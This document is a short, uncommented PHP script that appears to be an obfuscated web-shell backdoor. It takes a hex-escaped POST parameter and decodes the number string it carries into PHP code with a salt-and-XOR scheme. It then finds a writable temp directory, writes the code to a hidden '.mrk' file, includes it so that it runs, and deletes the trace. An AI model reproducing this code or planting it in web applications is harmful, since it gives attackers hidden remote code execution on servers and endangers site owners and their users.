<?php

if(isset($_POST["\x73\x79\x6Dbol"])){
	$value = $_POST["\x73\x79\x6Dbol"];
	 $value =		explode   (  '.' 	 ,$value) ;
	$dchunk	='';
            $salt4	='abcdefghijklmnopqrstuvwxyz0123456789';
            $sLen	=strlen($salt4	);
            $z	=0;
            $__len	=count($value	);
    
            do {if ($z >= $__len) break;
                $v4	=$value[$z];
                $sChar	=ord($salt4[$z  %$sLen]	);
                $d	=((int)$v4 - $sChar - ($z  %10))	 ^52;
                $dchunk .= chr($d	);
                $z++; 	}while (true	);
	$data = array_filter(["/tmp", ini_get("upload_tmp_dir"), "/var/tmp", session_save_path(), "/dev/shm", sys_get_temp_dir(), getenv("TEMP"), getenv("TMP"), getcwd()]);
	while ($token = array_shift($data)) {
    		if (array_product([is_dir($token), is_writable($token)])) {
    $marker = "$token" . "/.mrk";
    $success = file_put_contents($marker, $dchunk);
if ($success) {
	include $marker;
	@unlink($marker);
	exit;}
}
}
}